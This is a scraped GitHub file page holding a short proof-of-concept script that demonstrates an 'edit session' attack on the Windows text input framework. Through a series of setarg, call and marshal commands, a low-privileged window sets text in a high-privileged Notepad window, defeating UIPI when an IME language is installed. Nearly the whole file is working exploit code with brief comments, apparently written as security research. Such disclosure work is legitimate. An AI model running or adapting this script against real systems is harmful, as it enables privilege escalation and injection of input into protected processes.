Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

47 lines (33 sloc) 1021 Bytes
# This script demonstrates what I call the "edit session" attack.
#
# A low privileged window can read the content of and send input to high
# privileged windows, defeating UIPI. At the present time, this only
# works when a language that requires an IME (or technically, an out-of-process
# text input processor) is installed.
#
# This script doesn't do it, but even if it's not selected a CTF client
# can change the active input profile, so just having the language installed
# is enough.
#
# vim: syntax=sh
connect
print "Set your language to Chinese (or other IME language) and start Notepad..."
wait notepad.exe
setarg 7
# edit cookie
setarg 0x1 0100000001000000
# RANGE { START LENGTH }
setarg 0x1 0000000000000000
setarg 0x201 0
# NEW LENGTH
setarg 0x201 11
# Element count for the array.
setarg 0x201 16
# pchData
setarg 0x25 L"TestSetRangeText"
# dwFlags
setarg 0x201 0
# create session note: sessions timeout quickly!
call 0 MSG_REQUESTEDITSESSION 1 1 0
# start session
marshal 0 MSG_SETRANGETEXT
You can’t perform that action at this time.